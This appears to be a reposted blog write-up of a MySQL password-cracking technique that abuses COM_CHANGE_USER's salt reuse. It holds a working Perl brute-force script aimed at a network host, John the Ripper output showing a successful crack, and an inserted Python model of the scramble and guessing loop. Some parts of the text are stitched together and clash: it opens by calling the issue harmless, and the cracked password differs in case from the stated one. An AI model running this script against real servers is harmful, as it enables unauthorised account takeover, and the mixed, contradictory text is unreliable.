Quick MySQL local and remote password cracking! The first thing to tell the database maintainers is that there is nothing to worry about and nothing to fix; it looks like a minor bug.
I have found a method that cracks MySQL user passwords efficiently, both for local users and for users reached over the network. In my tests, about 5000 passwords per second can be tried over the network.
The method is as follows:
The attacker logs on to the MySQL server with a non-privileged account. MySQL has a command named change_user (COM_CHANGE_USER, command byte 0x11) that switches the user of the current session. The command executes very quickly, so it can be used to brute-force MySQL passwords at high speed instead of reconnecting to the server for every attempt.
Why is it so fast?
Because the change_user command does not change the SALT (that is the weakness), whereas the server sends a different SALT with every new connection.
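To make the mechanism concrete, here is an added Python model of the exchange; it is not code from the original post and it does not talk to a real server. It implements the mysql_native_password scramble the Perl script below calls (SHA1(password) XOR SHA1(salt + SHA1(SHA1(password)))), builds the COM_CHANGE_USER payload the same way the script does (command byte 0x11, user, NUL, a 0x14 length byte, the 20-byte response, NUL), and stands in for the server check, which holds SHA1(SHA1(password)) and can recover SHA1(password) from the response using the same salt. The salt, the account name, the wordlist and the function names are constructed for the example. The brute-force loop runs every candidate against one fixed salt, which is exactly the situation the text describes: the client computes a fresh response per guess either way, and the throughput comes from never having to reconnect and read a new handshake.

```python
import hashlib

# Constructed example values; not taken from the original post.
SALT = b"0123456789abcdefghij"   # 20-byte scramble the server sends once per connection
COM_CHANGE_USER = 0x11           # command byte the Perl script sends as "\x11"


def sha1(data: bytes) -> bytes:
    return hashlib.sha1(data).digest()


def mysql_native_scramble(password: str, salt: bytes) -> bytes:
    """Client side of mysql_native_password:
    SHA1(password) XOR SHA1(salt + SHA1(SHA1(password)))."""
    stage1 = sha1(password.encode())
    stage2 = sha1(stage1)
    mask = sha1(salt + stage2)
    return bytes(a ^ b for a, b in zip(stage1, mask))


def stored_hash(password: str) -> bytes:
    """What the server keeps for the account: SHA1(SHA1(password))."""
    return sha1(sha1(password.encode()))


def build_change_user_payload(user: str, scramble: bytes, db: str = "") -> bytes:
    """COM_CHANGE_USER body as the Perl script assembles it:
    0x11, user, NUL, length byte (0x14 for 20 bytes), auth response, db, NUL."""
    return (bytes([COM_CHANGE_USER]) + user.encode() + b"\0"
            + bytes([len(scramble)]) + scramble
            + db.encode() + b"\0")


def parse_change_user(payload: bytes):
    """Minimal parse of the payload: command byte, NUL-terminated user,
    length-prefixed auth response. Returns (user, auth_response)."""
    if payload[0] != COM_CHANGE_USER:
        raise ValueError("not a COM_CHANGE_USER payload")
    end = payload.index(b"\0", 1)
    user = payload[1:end].decode()
    n = payload[end + 1]
    auth = payload[end + 2:end + 2 + n]
    return user, auth


def server_verify(stored: bytes, salt: bytes, response: bytes) -> bool:
    """Stand-in for the server check: unmask the response with the salt it
    handed out, recover SHA1(password), and compare its SHA1 with the stored hash."""
    if len(response) != 20:
        return False
    mask = sha1(salt + stored)
    stage1 = bytes(a ^ b for a, b in zip(response, mask))
    return sha1(stage1) == stored


def crack_with_fixed_salt(stored: bytes, salt: bytes, user: str, candidates):
    """One connection, one salt, one COM_CHANGE_USER per candidate.
    Returns (password or None, number of attempts)."""
    attempts = 0
    for pw in candidates:
        attempts += 1
        payload = build_change_user_payload(user, mysql_native_scramble(pw, salt))
        parsed_user, auth = parse_change_user(payload)   # what the server would read
        if parsed_user == user and server_verify(stored, salt, auth):
            return pw, attempts
    return None, attempts


if __name__ == "__main__":
    # Constructed wordlist standing in for "john --incremental --stdout" output.
    wordlist = ["123456", "secret", "admin", "pass", "letmein"]
    target = stored_hash("pass")   # account "crackme" with password "pass", as in the post
    found, n = crack_with_fixed_salt(target, SALT, "crackme", wordlist)
    print(f"[*] Cracked! --> {found} after {n} attempts")
```

The practical check this suggests for a server operator is the inverse of the loop: a hardened server must treat a failed COM_CHANGE_USER like a failed login and drop the connection (or at least hand out a new scramble), so that every guess again costs a full TCP connect and handshake rather than one round trip on an already authenticated session.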
The following Perl script reads candidate passwords generated by John the Ripper (--stdout) from standard input and tries each one with change_user:
The test user is named crackme and its password is pass; it is cracked within seconds.
(100,000 passwords can be tested in about 20 seconds.)
The test script is as follows:
use Net::MySQL;

$|=1;

# Log in once with a valid but unprivileged account; the server sends the
# 20-byte salt in this handshake and, on a vulnerable server, keeps using it.
my $mysql = Net::MySQL->new(
    hostname => '192.168.2.3',
    database => 'test',
    user     => "user",
    password => "secret",
    debug    => 0,
);

# Account whose password is being brute-forced.
$crackuser = "crackme";

# One candidate password per line, e.g. from "john --incremental --stdout".
while (<STDIN>) {
    chomp;
    $currentpass = $_;

    # COM_CHANGE_USER body: user, NUL, 0x14 (length of the 20-byte response),
    # the scrambled password computed with the salt from the handshake, NUL.
    $vv = join "\0",
        $crackuser,
        "\x14" .
        Net::MySQL::Password->scramble(
            $currentpass, $mysql->{salt}, $mysql->{client_capabilities}
        ) . "\0";

    # "\x11" is COM_CHANGE_USER; a non-empty reply means the switch succeeded.
    if ($mysql->_execute_command("\x11", $vv) ne undef) {
        print "[*] Cracked! --> $currentpass\n";
        exit;
    }
}
The following is the execution result on my machine:
C:\Users\Kingdom\Desktop>C:\Users\Kingdom\Desktop\john179\run\john --incremental --stdout=5 | perl mysqlcrack.pl
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
Words: 16382  time: 0:00:00:02  w/s: 6262  current: citcH
Words: 24573  time: 0:00:00:04  w/s: 4916  current: rap
Words: 40956  time: 0:00:00:07  w/s: 5498  current: matc3
Words: 49147  time: 0:00:00:09  w/s: 5030  current: 4429
Words: 65530  time: 0:00:00:12  w/s: 5354  current: ch141
Words: 73721  time: 0:00:00:14  w/s: 5021  current: v3n
Words: 90104  time: 0:00:00:17  w/s: 5277  current: pun2
[*] Cracked! --> Pass
Words: 98295  time: 0:00:00:18  w/s: 5434  current: 43gs
Session aborted
Good luck :)
Via grok